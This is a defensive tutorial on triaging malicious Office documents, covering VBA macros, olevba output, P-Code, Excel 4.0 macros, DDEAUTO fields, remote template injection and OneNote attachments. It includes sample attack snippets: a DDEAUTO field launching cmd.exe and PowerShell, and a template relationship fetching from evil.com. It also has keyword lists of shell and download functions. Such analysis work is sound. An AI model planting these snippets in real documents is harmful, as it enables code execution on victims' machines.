VBA macro infection chains, document format identification, olevba analysis, P-Code, Excel 4.0 XLM macros, DDEAUTO, remote template injection, and malicious OneNote files — with a complete triage workflow.
Sign in to mark this article as read and track your progress.
Microsoft Office documents are the most common malware delivery mechanism via email. The attack relies on:
Attackers have refined this chain over decades. Despite Microsoft disabling macros by default from the internet in 2022, legacy enterprise configurations and older Office versions remain vulnerable.
Always verify format by header bytes — not file extension. Attackers rename formats to bypass filters.
| Extension | Format | Header Bytes | Macro Support |
|---|---|---|---|
.doc | OLE2 (binary) | D0 CF 11 E0 | VBA in OLE streams |
.docx | OOXML (ZIP) | 50 4B 03 04 | None (macro-free by design) |
.docm | OOXML (ZIP) | 50 4B 03 04 | VBA in vbaProject.bin |
.xls | OLE2 (binary) | D0 CF 11 E0 | VBA + Excel 4.0 (XLM) macros |
.xlsm | OOXML (ZIP) | 50 4B 03 04 | VBA + XLM possible |
file suspicious.doc # Linux: identifies by magic bytes
xxd suspicious.doc | head -1 # Show first 16 bytes manually
oleid suspicious.doc
Example output:
Filename: suspicious.doc
-----------------------------
Indicator Value
-----------------------------
File format: MS Word 97-2003 Document (.doc)
Container format: OLE
Encrypted: False
VBA Macros: Yes (high risk)
AutoExec macro: Yes
Suspicious keywords: Shell, CreateObject, WScript, PowerShell
oleid provides a rapid risk assessment in seconds.
olevba suspicious.doc
olevba -c suspicious.doc # output only the code
olevba --deobfuscate suspicious.doc
olevba analysis output:
+----------+--------------------+----------------------------------+
|Type |Keyword |Description |
+----------+--------------------+----------------------------------+
|AutoExec |AutoOpen |Runs when document opens |
|Suspicious|Shell |May run executable |
|Suspicious|WScript.Shell |Command via Windows Script Host |
|IOC |powershell.exe |Executable referenced in macro |
|IOC |http://evil.com/x |URL referenced in macro |
+----------+--------------------+----------------------------------+
| Keyword | Implication |
|---|---|
AutoOpen, Document_Open, Workbook_Open | Auto-execution on document open |
Shell(), WScript.Shell | Command execution via shell |
CreateObject("WScript.Shell") | Shell via COM object |
powershell, cmd.exe, mshta | LOLBin invocation |
URLDownloadToFile, XMLHTTP | File download |
Chr(nn) sequences | Character-code obfuscation |
String concatenation ("Pow"&"erSh"&"ell") | Keyword split to evade scanners |
P-Code is compiled VBA bytecode stored in a separate stream inside the OLE file. It executes even when the VBA source code has been stripped from the document.
Why this matters: an analyst who removes the visible VBA source using a hex editor but leaves the P-Code stream intact will be deceived — the document still executes the original macro.
pcode2code suspicious.doc # extract P-Code and convert back to source
Always check for P-Code discrepancies between the visible source and the compiled bytecode.
Excel 4.0 macros predate VBA. They are stored directly in spreadsheet cells — not in vbaProject.bin. Many security tools that scan for VBA macros completely miss XLM macros.
XLM macro indicators:
MACRO1, Sheet1 containing unusual cell formulas=EXEC(), =CALL(), =REGISTER() functions in cellsxlVeryHidden)XLMMacroDeobfuscator -f suspicious.xls # parse and emulate XLM macros
Dynamic Data Exchange (DDE) fields in Word documents can execute commands without requiring macros to be enabled:
{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -c ..." }
When the document opens, Word attempts to update the DDE field, which executes the command. Word shows a warning prompt but many users click through.
Detection: Open document in a text editor and search for DDEAUTO or DDE followed by a command path. In Procmon, look for Word spawning cmd.exe or powershell.exe.
A .docx file is a ZIP archive. The file word/_rels/settings.xml.rels can reference an external template:
<Relationships>
<Relationship Type="http://schemas.../attachedTemplate"
Target="http://evil.com/template.dot"
TargetMode="External"/>
</Relationships>
When Word opens the document, it fetches the remote template — which can contain VBA macros — and executes them. The initial .docx itself is clean and passes all static scans.
Detection: Unzip the .docx and inspect word/_rels/settings.xml.rels for external Target URLs.
Since Microsoft blocked macro-enabled documents by default, attackers shifted to .one (OneNote) files. They embed attached file objects (executables, scripts) that execute when the user clicks a button or image in the notebook.
# OneNote files are not OLE or ZIP — use a dedicated parser
onenote-extractor suspicious.one
Indicators: OneNote files with embedded .exe, .hta, .bat, .vbs, .js objects are almost certainly malicious.
1. xxd suspicious.doc | head → verify format by magic bytes
2. oleid suspicious.doc → rapid risk assessment
3. olevba suspicious.doc → extract VBA, flag suspicious keywords
4. If Excel: XLMMacroDeobfuscator → check for XLM macros
5. If .docx: unzip + inspect word/_rels/settings.xml.rels → remote template?
6. Search for DDEAUTO in document text
7. pcode2code suspicious.doc → check P-Code vs visible source
8. Extract IOCs: URLs, file paths, shell commands, PowerShell payloads
9. Detonate in VM with Procmon + FakeNet-NG to confirm behaviour